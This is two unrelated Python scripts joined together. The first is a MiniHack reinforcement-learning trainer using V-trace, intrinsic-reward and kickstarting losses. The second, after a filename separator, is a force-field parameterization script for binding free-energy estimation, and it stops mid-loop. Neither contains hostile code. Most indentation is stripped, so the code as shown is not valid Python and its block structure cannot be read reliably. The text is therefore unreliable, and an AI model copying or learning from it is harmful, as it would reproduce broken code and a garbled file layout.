# Run with OMP_NUM_THREADS=1.
#
import argparse
import collections
import logging
import omegaconf
import os
import threading
import time
import timeit
import traceback
import wandb
import nest
import torch
from minihack.agent.polybeast.core import file_writer
from minihack.agent.polybeast.core import vtrace
from minihack.agent.polybeast.models import create_model, losses
from minihack.agent.polybeast.models.base import NetHackNet
from minihack.agent.polybeast.models.intrinsic import IntrinsicRewardNet
import libtorchbeast
from torch import nn
from torch.nn import functional as F
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument('--env', default='staircase', type=str, metavar='E',
help='Name of Gym environment to create.')
parser.add_argument("--wandb", action="store_true",
help="Log to wandb.")
parser.add_argument('--group', default='default', type=str, metavar='G',
help='Name of the experiment group (as being used by wandb).')
parser.add_argument('--project', default='minihack', type=str, metavar='P',
help='Name of the project (as being used by wandb).')
parser.add_argument('--entity', default='nethack', type=str, metavar='P',
help='Which team to log to.')
# Training settings.
parser.add_argument("--pipes_basename", default="unix:/tmp/polybeast",
help="Basename for the pipes for inter-process communication. "
"Has to be of the type unix:/some/path.")
parser.add_argument("--savedir", default="~/palaas/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors")
parser.add_argument("--total_steps", default=1e6, type=float, metavar="T",
help="Total environment steps to train for. Will be cast to int.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension)")
parser.add_argument("--num_learner_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--num_inference_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--learner_device", default="cuda:0", help="Set learner device")
parser.add_argument("--actor_device", default="cuda:1", help="Set actor device")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
parser.add_argument("--use_index_select", action="store_true",
help="Whether to use index_select instead of embedding lookup.")
parser.add_argument("--max_learner_queue_size", default=None, type=int, metavar="N",
help="Optional maximum learner queue size. "
"Defaults to batch_size.")
# Model settings.
parser.add_argument('--model', default="baseline",
help='Name of the model to run')
parser.add_argument('--crop_model', default="cnn", choices=["cnn", "transformer"],
                    help='Model architecture applied to the cropped window around the agent')
parser.add_argument('--crop_dim', type=int, default=9,
help='Size of cropping window around the agent')
parser.add_argument('--embedding_dim', type=int, default=32,
help='Size of glyph embeddings.')
parser.add_argument('--hidden_dim', type=int, default=128,
help='Size of hidden representations.')
parser.add_argument('--layers', type=int, default=5,
help='Number of ConvNet/Transformer layers.')
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006, type=float,
help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5, type=float,
help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99, type=float,
help="Discounting factor.")
parser.add_argument("--reward_clipping", default="tim",
choices=["soft_asymmetric", "none", "tim"],
help="Reward clipping.")
parser.add_argument("--no_extrinsic", action="store_true",
help=("Disables extrinsic reward (no baseline/pg_loss)."))
parser.add_argument("--normalize_reward", action="store_true",
help=("Normalizes reward by dividing by running stdev from "
"mean."))
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048, type=float,
metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# Misc settings.
parser.add_argument("--write_profiler_trace", action="store_true",
help="Collect and write a profiler trace "
"for chrome://tracing/.")
# yapf: enable
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] "
"%(message)s"
),
level=0,
)
def inference(
inference_batcher, model, flags, actor_device, lock=threading.Lock()
): # noqa: B008
with torch.no_grad():
for batch in inference_batcher:
batched_env_outputs, agent_state = batch.get_inputs()
observation, reward, done, *_ = batched_env_outputs
# Observation is a dict with keys 'features' and 'glyphs'.
observation["done"] = done
observation, agent_state = nest.map(
lambda t: t.to(actor_device, non_blocking=True),
(observation, agent_state),
)
with lock:
outputs = model(observation, agent_state)
core_outputs, agent_state = nest.map(lambda t: t.cpu(), outputs)
# Restructuring the output in the way that is expected
# by the functions in actorpool.
outputs = (
tuple(
(
core_outputs["action"],
core_outputs["policy_logits"],
core_outputs["baseline"],
core_outputs["chosen_option"],
core_outputs["teacher_logits"],
core_outputs["pot_sm"],
)
),
agent_state,
)
batch.set_outputs(outputs)
EnvOutput = collections.namedtuple(
"EnvOutput", "frame rewards done episode_step episode_return"
)
AgentOutput = NetHackNet.AgentOutput
Batch = collections.namedtuple("Batch", "env agent")
def clip(flags, rewards):
if flags.reward_clipping == "tim":
clipped_rewards = torch.tanh(rewards / 100.0)
elif flags.reward_clipping == "soft_asymmetric":
squeezed = torch.tanh(rewards / 5.0)
# Negative rewards are given less weight than positive rewards.
clipped_rewards = (
torch.where(rewards < 0, 0.3 * squeezed, squeezed) * 5.0
)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
else:
raise NotImplementedError("reward_clipping=%s" % flags.reward_clipping)
return clipped_rewards
def learn(
learner_queue,
model,
actor_model,
optimizer,
scheduler,
stats,
flags,
plogger,
learner_device,
lock=threading.Lock(), # noqa: B008
):
for tensors in learner_queue:
tensors = nest.map(lambda t: t.to(learner_device), tensors)
batch, initial_agent_state = tensors
env_outputs, actor_outputs = batch
observation, reward, done, *_ = env_outputs
observation["reward"] = reward
observation["done"] = done
lock.acquire() # Only one thread learning at a time.
output, _ = model(observation, initial_agent_state, learning=True)
if flags.model == "foc":
# chosen_option
output["action"] = output["chosen_option"]
# Use last baseline value (from the value function) to bootstrap.
learner_outputs = AgentOutput._make(
(
output["action"],
output["policy_logits"],
output["baseline"],
output["chosen_option"],
output["teacher_logits"],
output["pot_sm"],
)
)
# At this point, the environment outputs at time step `t` are the inputs
# that lead to the learner_outputs at time step `t`. After the following
# shifting, the actions in `batch` and `learner_outputs` at time
# step `t` is what leads to the environment outputs at time step `t`.
batch = nest.map(lambda t: t[1:], batch)
learner_outputs = nest.map(lambda t: t[:-1], learner_outputs)
# Turn into namedtuples again.
env_outputs, actor_outputs = batch
# Note that the env_outputs.frame is now a dict with 'features' and 'glyphs'
# instead of actually being the frame itself. This is currently not a problem
# because we never use actor_outputs.frame in the rest of this function.
env_outputs = EnvOutput._make(env_outputs)
actor_outputs = AgentOutput._make(actor_outputs)
learner_outputs = AgentOutput._make(learner_outputs)
if flags.model == "foc":
actor_outputs = AgentOutput._make(
(
actor_outputs.chosen_option,
actor_outputs.policy_logits,
actor_outputs.baseline,
actor_outputs.chosen_option,
actor_outputs.teacher_logits,
actor_outputs.pot_sm,
)
)
learner_outputs = AgentOutput._make(
(
learner_outputs.chosen_option,
learner_outputs.policy_logits,
learner_outputs.baseline,
learner_outputs.chosen_option,
learner_outputs.teacher_logits,
learner_outputs.pot_sm,
)
)
rewards = env_outputs.rewards
if flags.normalize_reward:
model.update_running_moments(rewards)
rewards /= model.get_running_std()
total_loss = 0
# INTRINSIC REWARDS
calculate_intrinsic = (
isinstance(model, IntrinsicRewardNet) and model.intrinsic_enabled()
)
if calculate_intrinsic:
# Compute intrinsic reward and loss
if "int_baseline" not in output:
raise RuntimeError("Expected intrinsic outputs but found none")
# set intrinsic reward dimensions here so we don't make any mistakes later
intrinsic_reward = rewards.new_zeros(rewards.size()).float()
if flags.model == "rnd":
# Random Network Distillation
target = output["target"][1:]
predicted = output["predicted"][1:]
# loss for prediction failures, not really "forward" model
forward_loss = flags.rnd.forward_cost * F.mse_loss(
target, predicted, reduction="mean"
)
total_loss += forward_loss
# reward based on unpredicted scenarios
intrinsic_reward += (target - predicted).pow(2).sum(2) * 0.5
elif flags.model == "ride":
# Rewarding Impact-Driven Exploration
state_emb = output["state_embedding"][:-1]
next_state_emb = output["state_embedding"][1:]
actions = actor_outputs.action
pred_next_state_emb = model.forward_dynamics_model(
state_emb, actions
)
pred_actions = model.inverse_dynamics_model(
state_emb, next_state_emb
)
forward_loss = (
flags.ride.forward_cost
* losses.compute_forward_dynamics_loss(
pred_next_state_emb, next_state_emb
)
)
inverse_loss = (
flags.ride.inverse_cost
* losses.compute_inverse_dynamics_loss(
pred_actions, actions
)
)
total_loss += forward_loss + inverse_loss
intrinsic_reward += torch.norm(
next_state_emb - state_emb, dim=2, p=2
)
if flags.ride.count_norm:
if "state_visits" not in observation:
raise RuntimeError(
"ride.count_norm=true but state_counter=none"
)
# -- [T x B ]
counts = (
observation["state_visits"][1:]
.squeeze(-1)
.float()
.sqrt()
)
intrinsic_reward /= counts
if flags.int.normalize_reward:
model.update_intrinsic_moments(intrinsic_reward)
intrinsic_reward /= model.get_intrinsic_std()
intrinsic_reward *= flags.int.intrinsic_weight
if not flags.int.twoheaded and not flags.no_extrinsic:
# add intrinsic rewards to extrinsic ones
rewards += intrinsic_reward
# STANDARD EXTRINSIC LOSSES / REWARDS
if flags.entropy_cost > 0:
entropy_loss = flags.entropy_cost * losses.compute_entropy_loss(
learner_outputs.policy_logits
)
total_loss += entropy_loss
if not flags.no_extrinsic:
clipped_rewards = clip(flags, rewards)
discounts = (~env_outputs.done).float() * flags.discounting
# This could be in C++. In TF, this is actually slower on the GPU.
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=actor_outputs.policy_logits,
target_policy_logits=learner_outputs.policy_logits,
actions=actor_outputs.action,
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs.baseline,
bootstrap_value=learner_outputs.baseline[-1],
)
# Compute loss as a weighted sum of the baseline loss, the policy
# gradient loss and an entropy regularization term.
pg_loss = losses.compute_policy_gradient_loss(
learner_outputs.policy_logits,
actor_outputs.action,
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * losses.compute_baseline_loss(
vtrace_returns.vs - learner_outputs.baseline
)
total_loss += pg_loss + baseline_loss
# TWO-HEADED INTRINSIC REWARDS / LOSSES
if calculate_intrinsic and (flags.int.twoheaded or flags.no_extrinsic):
# here we calculate RL loss on the intrinsic reward using its own value head
# 1) twoheaded always separates ext and int rewards to their own heads
# 2) no_extrinsic skips the ext value head and uses only the int one
int_clipped_rewards = clip(flags, intrinsic_reward)
# use a separate discounting factor for intrinsic rewards
if flags.int.episodic:
int_discounts = (
~env_outputs.done
).float() * flags.int.discounting
else:
# can also do non-episodic intrinsic rewards
int_discounts = discounts.new_full(
discounts.size(), flags.int.discounting
)
int_vtrace_returns = vtrace.from_logits(
behavior_policy_logits=actor_outputs.policy_logits,
target_policy_logits=learner_outputs.policy_logits,
actions=actor_outputs.action,
discounts=int_discounts, # intrinsic discounts
rewards=int_clipped_rewards, # intrinsic reward
values=output["int_baseline"][1:], # intrinsic baseline
bootstrap_value=output["int_baseline"][
-1
], # intrinsic bootstrap
)
# intrinsic baseline loss
int_baseline_loss = (
flags.int.baseline_cost
* losses.compute_baseline_loss(
int_vtrace_returns.vs - output["int_baseline"][1:]
)
)
# intrinsic policy gradient loss
int_pg_loss = losses.compute_policy_gradient_loss(
learner_outputs.policy_logits,
actor_outputs.action,
int_vtrace_returns.pg_advantages,
)
total_loss += int_pg_loss + int_baseline_loss
# KICKSTARTING LOSS
ks_loss = 0
if flags.model in ["ks", "hks"]:
timestep = (
stats.get("step", 0) + flags.unroll_length * flags.batch_size
)
if timestep < flags.ks_max_time:
lam = flags.ks_max_lambda * max(
(1 - timestep / flags.ks_max_time),
flags.ks_min_lambda_prop,
)
else:
lam = flags.ks_min_lambda_prop * flags.ks_max_lambda
teacher_log_probs = torch.log(learner_outputs.teacher_logits)
policy_log_probs = torch.log_softmax(
learner_outputs.policy_logits, 2
)
ks_loss = lam * nn.KLDivLoss(
log_target=True, reduction="batchmean"
)(teacher_log_probs, policy_log_probs)
print("~", timestep, "total_loss", total_loss, "ks_loss", ks_loss)
total_loss += ks_loss
# BACKWARD STEP
optimizer.zero_grad()
total_loss.backward()
if flags.grad_norm_clipping > 0:
nn.utils.clip_grad_norm_(
model.parameters(), flags.grad_norm_clipping
)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
# LOGGING
# episode_rewards = env_outputs.rewards
# print('!', episode_rewards)
# print('?', env_outputs.episode_return)
# print('@', env_outputs.done)
# Success rate
done_masked = env_outputs.done.cpu()
done_masked[0, :] = False
false_fill = torch.zeros((1, done_masked.shape[1]), dtype=torch.bool)
done_m1 = torch.cat((done_masked[1:, :], false_fill), dim=0)
masked_returns = env_outputs.episode_return[done_masked]
masked_returns_m1 = env_outputs.episode_return[done_m1]
diff = masked_returns - masked_returns_m1
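        # diff is the reward collected on the final step of each finished
        # episode: a clearly positive final reward counts as a win, a clearly
        # negative one as a loss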
n_wins = len(diff[diff > 0.5])
n_losses = len(diff[diff < -0.5])
if n_wins + n_losses != len(diff):
print("Invalid runs, some did not end in a win or a loss:")
print(diff)
if len(diff) == 0:
success_rate = None
else:
success_rate = n_wins / len(diff)
stats["success_rate"] = success_rate
# Meta network entropy
if flags.model in ["hks"]:
meta_sm = actor_outputs.pot_sm
entropies = -(meta_sm * torch.log(meta_sm)).sum(dim=2)
avg_entropy = torch.mean(entropies)
stats["meta_entropy"] = avg_entropy
# Other stats
episode_returns = env_outputs.episode_return[env_outputs.done]
stats["step"] = (
stats.get("step", 0) + flags.unroll_length * flags.batch_size
)
stats["mean_episode_return"] = torch.mean(episode_returns).item()
stats["mean_episode_step"] = torch.mean(
env_outputs.episode_step.float()
).item()
stats["total_loss"] = total_loss.item()
if flags.entropy_cost > 0:
stats["entropy_loss"] = entropy_loss.item()
if not flags.no_extrinsic:
stats["pg_loss"] = pg_loss.item()
stats["baseline_loss"] = baseline_loss.item()
stats["learner_queue_size"] = learner_queue.size()
if calculate_intrinsic:
stats["intrinsic_reward"] = torch.mean(intrinsic_reward).item()
if flags.model == "rnd":
stats["forward_loss"] = forward_loss.item()
elif flags.model == "ride":
stats["forward_loss"] = forward_loss.item()
stats["inverse_loss"] = inverse_loss.item()
if flags.int.twoheaded:
stats["int_baseline_loss"] = int_baseline_loss.item()
stats["int_pg_loss"] = int_pg_loss.item()
if "state_visits" in observation:
visits = observation["state_visits"][:-1]
metric = visits[env_outputs.done].float()
key1 = "mean_state_visits"
key2 = "max_state_visits"
if not len(episode_returns):
stats[key1] = None
stats[key2] = None
else:
stats[key1] = torch.mean(metric).item()
stats[key2] = torch.max(metric).item()
DEBUG = False
if DEBUG and env_outputs.done.sum() > 0:
print()
print("glyphs shape", env_outputs.frame["glyphs"].shape)
print("features shape", env_outputs.frame["features"].shape)
print(
"episode_step",
env_outputs.episode_step[:, 0],
env_outputs.episode_step.shape,
)
print(
"rewards", env_outputs.rewards[:, 0], env_outputs.rewards.shape
)
print(
"episode_return",
env_outputs.episode_return[:, 0],
env_outputs.episode_return.shape,
)
print("done", env_outputs.done[:, 0], env_outputs.done.shape)
if not len(episode_returns):
# Hide the mean-of-empty-tuple NaN as it scares people.
stats["mean_episode_return"] = None
# Only logging if at least one episode was finished
if len(episode_returns):
# TODO: log also SPS
plogger.log(stats)
if flags.wandb:
wandb.log(stats, step=stats["step"])
lock.release()
def train(flags):
logging.info("Logging results to %s", flags.savedir)
if isinstance(flags, omegaconf.DictConfig):
flag_dict = omegaconf.OmegaConf.to_container(flags)
else:
flag_dict = vars(flags)
plogger = file_writer.FileWriter(xp_args=flag_dict, rootdir=flags.savedir)
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
learner_device = torch.device(flags.learner_device)
actor_device = torch.device(flags.actor_device)
else:
logging.info("Not using CUDA.")
learner_device = torch.device("cpu")
actor_device = torch.device("cpu")
if flags.max_learner_queue_size is None:
flags.max_learner_queue_size = flags.batch_size
# The queue the learner threads will get their data from.
# Setting `minimum_batch_size == maximum_batch_size`
# makes the batch size static. We could make it dynamic, but that
# requires a loss (and learning rate schedule) that's batch size
# independent.
learner_queue = libtorchbeast.BatchingQueue(
batch_dim=1,
minimum_batch_size=flags.batch_size,
maximum_batch_size=flags.batch_size,
check_inputs=True,
maximum_queue_size=flags.max_learner_queue_size,
)
# The "batcher", a queue for the inference call. Will yield
# "batch" objects with `get_inputs` and `set_outputs` methods.
# The batch size of the tensors will be dynamic.
inference_batcher = libtorchbeast.DynamicBatcher(
batch_dim=1,
minimum_batch_size=1,
maximum_batch_size=512,
timeout_ms=100,
check_outputs=True,
)
addresses = []
connections_per_server = 1
pipe_id = 0
while len(addresses) < flags.num_actors:
for _ in range(connections_per_server):
addresses.append(f"{flags.pipes_basename}.{pipe_id}")
if len(addresses) == flags.num_actors:
break
pipe_id += 1
logging.info("Using model %s", flags.model)
model = create_model(flags, learner_device)
plogger.metadata["model_numel"] = sum(
p.numel() for p in model.parameters() if p.requires_grad
)
logging.info(
"Number of model parameters: %i", plogger.metadata["model_numel"]
)
actor_model = create_model(flags, actor_device)
# The ActorPool that will run `flags.num_actors` many loops.
actors = libtorchbeast.ActorPool(
unroll_length=flags.unroll_length,
learner_queue=learner_queue,
inference_batcher=inference_batcher,
env_server_addresses=addresses,
initial_agent_state=model.initial_state(),
)
def run():
try:
actors.run()
except Exception as e:
logging.error("Exception in actorpool thread!")
traceback.print_exc()
print()
raise e
actorpool_thread = threading.Thread(target=run, name="actorpool-thread")
optimizer = torch.optim.RMSprop(
model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
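    # lr_lambda linearly anneals the learning rate from its initial value down
    # to zero over flags.total_steps environment steps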
def lr_lambda(epoch):
return (
1
- min(
epoch * flags.unroll_length * flags.batch_size,
flags.total_steps,
)
/ flags.total_steps
)
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
stats = {}
if flags.checkpoint and os.path.exists(flags.checkpoint):
logging.info("Loading checkpoint: %s" % flags.checkpoint)
checkpoint_states = torch.load(
flags.checkpoint, map_location=flags.learner_device
)
model.load_state_dict(checkpoint_states["model_state_dict"])
optimizer.load_state_dict(checkpoint_states["optimizer_state_dict"])
scheduler.load_state_dict(checkpoint_states["scheduler_state_dict"])
stats = checkpoint_states["stats"]
logging.info(f"Resuming preempted job, current stats:\n{stats}")
# Initialize actor model like learner model.
actor_model.load_state_dict(model.state_dict())
learner_threads = [
threading.Thread(
target=learn,
name="learner-thread-%i" % i,
args=(
learner_queue,
model,
actor_model,
optimizer,
scheduler,
stats,
flags,
plogger,
learner_device,
),
)
for i in range(flags.num_learner_threads)
]
inference_threads = [
threading.Thread(
target=inference,
name="inference-thread-%i" % i,
args=(inference_batcher, actor_model, flags, actor_device),
)
for i in range(flags.num_inference_threads)
]
actorpool_thread.start()
for t in learner_threads + inference_threads:
t.start()
def checkpoint(checkpoint_path=None):
if flags.checkpoint:
if checkpoint_path is None:
checkpoint_path = flags.checkpoint
logging.info("Saving checkpoint to %s", checkpoint_path)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"stats": stats,
"flags": vars(flags),
},
checkpoint_path,
)
def format_value(x):
return f"{x:1.5}" if isinstance(x, float) else str(x)
try:
train_start_time = timeit.default_timer()
train_time_offset = stats.get(
"train_seconds", 0
) # used for resuming training
last_checkpoint_time = timeit.default_timer()
dev_checkpoint_intervals = [0, 0.25, 0.5, 0.75]
loop_start_time = timeit.default_timer()
loop_start_step = stats.get("step", 0)
while True:
if loop_start_step >= flags.total_steps:
break
time.sleep(5)
loop_end_time = timeit.default_timer()
loop_end_step = stats.get("step", 0)
stats["train_seconds"] = round(
loop_end_time - train_start_time + train_time_offset, 1
)
if loop_end_time - last_checkpoint_time > 10 * 60:
# Save every 10 min.
checkpoint()
last_checkpoint_time = loop_end_time
if len(dev_checkpoint_intervals) > 0:
step_percentage = loop_end_step / flags.total_steps
i = dev_checkpoint_intervals[0]
if step_percentage > i:
checkpoint(flags.checkpoint[:-4] + "_" + str(i) + ".tar")
dev_checkpoint_intervals = dev_checkpoint_intervals[1:]
logging.info(
"Step %i @ %.1f SPS. Inference batcher size: %i."
" Learner queue size: %i."
" Other stats: (%s)",
loop_end_step,
(loop_end_step - loop_start_step)
/ (loop_end_time - loop_start_time),
inference_batcher.size(),
learner_queue.size(),
", ".join(
f"{key} = {format_value(value)}"
for key, value in stats.items()
),
)
loop_start_time = loop_end_time
loop_start_step = loop_end_step
except KeyboardInterrupt:
pass # Close properly.
else:
logging.info("Learning finished after %i steps.", stats["step"])
checkpoint()
# Done with learning. Let's stop all the ongoing work.
inference_batcher.close()
learner_queue.close()
actorpool_thread.join()
for t in learner_threads + inference_threads:
t.join()
def test(flags):
test_checkpoint = os.path.join(flags.savedir, "test_checkpoint.tar")
if not os.path.exists(os.path.dirname(test_checkpoint)):
os.makedirs(os.path.dirname(test_checkpoint))
logging.info("Creating test copy of checkpoint '%s'", flags.checkpoint)
checkpoint = torch.load(flags.checkpoint)
for d in checkpoint["optimizer_state_dict"]["param_groups"]:
d["lr"] = 0.0
d["initial_lr"] = 0.0
checkpoint["scheduler_state_dict"]["last_epoch"] = 0
checkpoint["scheduler_state_dict"]["_step_count"] = 0
checkpoint["scheduler_state_dict"]["base_lrs"] = [0.0]
checkpoint["stats"]["step"] = 0
checkpoint["stats"]["_tick"] = 0
flags.checkpoint = test_checkpoint
flags.learning_rate = 0.0
logging.info("Saving test checkpoint to %s", test_checkpoint)
torch.save(checkpoint, test_checkpoint)
train(flags)
def main(flags):
if flags.wandb:
flags_dict = omegaconf.OmegaConf.to_container(flags)
wandb.init(
project=flags.project,
config=flags_dict,
group=flags.group,
entity=flags.entity,
)
if flags.mode == "train":
if flags.write_profiler_trace:
logging.info("Running with profiler.")
with torch.autograd.profiler.profile() as prof:
train(flags)
filename = "chrome-%s.trace" % time.strftime("%Y%m%d-%H%M%S")
logging.info("Writing profiler trace to '%s.gz'", filename)
prof.export_chrome_trace(filename)
os.system("gzip %s" % filename)
else:
train(flags)
elif flags.mode.startswith("test"):
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
flags.total_steps = int(flags.total_steps) # Allows e.g. 1e6.
main(flags)
|
parameterize_simple.py
|
import copy
import argparse
import time
import numpy as np
from io import StringIO
import itertools
import os
import sys
from jax.config import config as jax_config
# this always needs to be set
jax_config.update("jax_enable_x64", True)
from scipy.stats import special_ortho_group
import jax
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from simtk.openmm import app
from simtk.openmm.app import PDBFile
from timemachine.lib import custom_ops, ops
from fe.utils import to_md_units, write
from fe import math_utils
from multiprocessing import Process, Pipe
from matplotlib import pyplot as plt
from jax.experimental import optimizers
from fe import simulation
from fe import loss
from fe.pdb_writer import PDBWriter
from ff import forcefield
from ff import system
from ff import openmm_converter
def com(conf):
return np.sum(conf, axis=0)/conf.shape[0]
def recenter(conf, true_com, scale_factor=1):
mol_com = np.sum(conf, axis=0)/conf.shape[0]
centered = conf - mol_com # centered to origin
return true_com + centered/scale_factor
from hilbertcurve.hilbertcurve import HilbertCurve
def hilbert_sort(conf):
hc = HilbertCurve(16, 3)
int_confs = (conf*1000).astype(np.int64)+10000
dists = []
for xyz in int_confs.tolist():
dist = hc.distance_from_coordinates(xyz)
dists.append(dist)
perm = np.argsort(dists)
return perm
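# Sorting atoms along a 3-D Hilbert curve keeps spatially nearby atoms adjacent
# in memory (presumably to improve locality in the custom nonbonded kernels).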
def get_masses(m):
masses = []
for a in m.GetAtoms():
masses.append(a.GetMass())
return masses
import jax.numpy as jnp
def error_fn(all_du_dls, T, schedule, true_dG):
fwd = all_du_dls[:, :T//2]
fwd_sched = schedule[:T//2]
bkwd = all_du_dls[:, T//2:]
bkwd_sched = schedule[T//2:]
dG_fwd = math_utils.trapz(fwd, fwd_sched) # integral from inf to 0
dG_bkwd = math_utils.trapz(bkwd, bkwd_sched) # integral from 0 to inf
# dG_fwd and dG_bkwd have the same sign, so we need to flip dG_bkwd so the
# direction of integral is the same (requirement for pymbar.BAR)
dG_bkwd = -dG_bkwd # this is needed for BAR to be correct
# this is in kJ/mol, inputs to BAR needs to be in 1/kT.
kT = 2.479
# kT = 1
dG_fwd /= kT
dG_bkwd /= kT
pred_dG = loss.mybar(jnp.stack([dG_fwd, dG_bkwd]))
pred_dG *= kT
print("fwd", dG_fwd)
print("bwd", dG_bkwd)
print("pred_dG", pred_dG)
return jnp.abs(pred_dG - true_dG)
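# The training loss is the absolute error between the BAR estimate of the free
# energy (built from the forward and backward nonequilibrium work integrals
# above) and the reference value true_dG; its gradient with respect to
# all_du_dls is what gets sent back to the worker processes below.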
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Quick Test')
parser.add_argument('--out_dir', type=str, required=True)
parser.add_argument('--precision', type=str, required=True)
parser.add_argument('--complex_pdb', type=str, required=True)
parser.add_argument('--ligand_sdf', type=str, required=True)
parser.add_argument('--num_gpus', type=int, required=True)
parser.add_argument('--num_conformers', type=int, required=True)
parser.add_argument('--forcefield', type=str, required=True)
args = parser.parse_args()
assert os.path.isdir(args.out_dir)
if args.precision == 'single':
precision = np.float32
elif args.precision == 'double':
precision = np.float64
else:
raise Exception("precision must be either single or double")
suppl = Chem.SDMolSupplier(args.ligand_sdf, removeHs=False)
all_guest_mols = []
for guest_mol in suppl:
all_guest_mols.append(guest_mol)
np.random.seed(123)
perm = np.arange(len(all_guest_mols))
np.random.shuffle(perm)
print(perm)
# np.random.shuffl(all_guest_mols)
guest_mol = all_guest_mols[perm[0]]
# break
num_gpus = args.num_gpus
all_du_dls = []
start = 1e3
end = 1.0
NT = 500
base = np.exp(np.log(end/start)/NT)
exps = np.arange(NT)
part_one = np.power(base, exps)*start
part_two = np.linspace(1.0, 0.3, 1000)
part_three = np.linspace(0.3, 0.0, 5000)
forward_schedule = np.concatenate([part_one, part_two, part_three])
backward_schedule = forward_schedule[::-1]
lambda_schedule = np.concatenate([forward_schedule, backward_schedule])
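    # forward (insertion) schedule: exponential decay of lambda from 1e3 down to
    # 1.0, followed by linear ramps 1.0 -> 0.3 -> 0.0; the backward (deletion)
    # schedule is simply the reverse, and both are concatenated into one run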
T = lambda_schedule.shape[0]
assert T % 2 == 0
dt = 0.0015
step_sizes = np.ones(T)*dt
assert T % 2 == 0
cas = np.ones(T)*0.93
epoch = 0
init_conf = guest_mol.GetConformer(0)
init_conf = np.array(init_conf.GetPositions(), dtype=np.float64)
init_conf = init_conf/10 # convert to md_units
conf_com = com(init_conf)
init_mol = Chem.Mol(guest_mol)
num_conformers = args.num_conformers
# generate a set of gas phase conformers using the RDKit
guest_mol.RemoveAllConformers()
AllChem.EmbedMultipleConfs(guest_mol, num_conformers, randomSeed=2020)
np.random.seed(2020)
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert to md_units
rot_matrix = special_ortho_group.rvs(3).astype(dtype=np.float64)
guest_conf = np.matmul(guest_conf, rot_matrix)*10
for atom_idx, pos in enumerate(guest_conf):
conformer.SetAtomPosition(atom_idx, (float(pos[0]), float(pos[1]), float(pos[2])))
lr = 5e-4
# opt_init, opt_update, get_params = optimizers.adam(lr)
opt_init, opt_update, get_params = optimizers.sgd(lr)
host_pdb_file = args.complex_pdb
host_pdb = app.PDBFile(host_pdb_file)
host_conf = []
for x,y,z in host_pdb.positions:
host_conf.append([to_md_units(x),to_md_units(y),to_md_units(z)])
host_conf = np.array(host_conf)
host_name = "complex"
# set up the system
amber_ff = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
host_system = amber_ff.createSystem(host_pdb.topology,
nonbondedMethod=app.NoCutoff,
constraints=None,
rigidWater=False)
cutoff = 1.25
host_system = openmm_converter.deserialize_system(host_system, cutoff=cutoff)
num_host_atoms = len(host_system.masses)
print("num_host_atoms", num_host_atoms)
# open_ff = forcefield.Forcefield("ff/smirnoff_1.1.0.py")
open_ff = forcefield.Forcefield(args.forcefield)
nrg_fns = open_ff.parameterize(guest_mol, cutoff=cutoff)
guest_masses = get_masses(guest_mol)
guest_system = system.System(nrg_fns, open_ff.params, open_ff.param_groups, guest_masses)
combined_system = host_system.merge(guest_system)
# cbs = -1*np.ones_like(np.array(combined_system.masses))*0.0001
cbs = -0.0001/np.array(combined_system.masses)
lambda_idxs = np.zeros(len(combined_system.masses), dtype=np.int32)
lambda_idxs[num_host_atoms:] = 1
sim = simulation.Simulation(
combined_system,
step_sizes,
cas,
cbs,
lambda_schedule,
lambda_idxs,
precision
)
initial_params = sim.system.params
opt_state = opt_init(initial_params)
num_epochs = 100
for epoch in range(num_epochs):
        # sample from the rdkit DG distribution (this can be changed to another distribution later on)
        epoch_params = get_params(opt_state)
        # deep copy of the OpenFF forcefield parameters at the start of the epoch
epoch_ff_params = copy.deepcopy(open_ff)
epoch_ff_params.params = epoch_params[len(host_system.params):]
fname = "epoch_"+str(epoch)+"_params"
fpath = os.path.join(args.out_dir, fname)
epoch_ff_params.save(fpath)
sim.system.params = np.asarray(epoch_params)
all_args = []
child_conns = []
parent_conns = []
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert to md_units
guest_conf = recenter(guest_conf, conf_com)
x0 = np.concatenate([host_conf, guest_conf]) # combined geometry
combined_pdb = Chem.CombineMols(Chem.MolFromPDBFile(host_pdb_file, removeHs=False), init_mol)
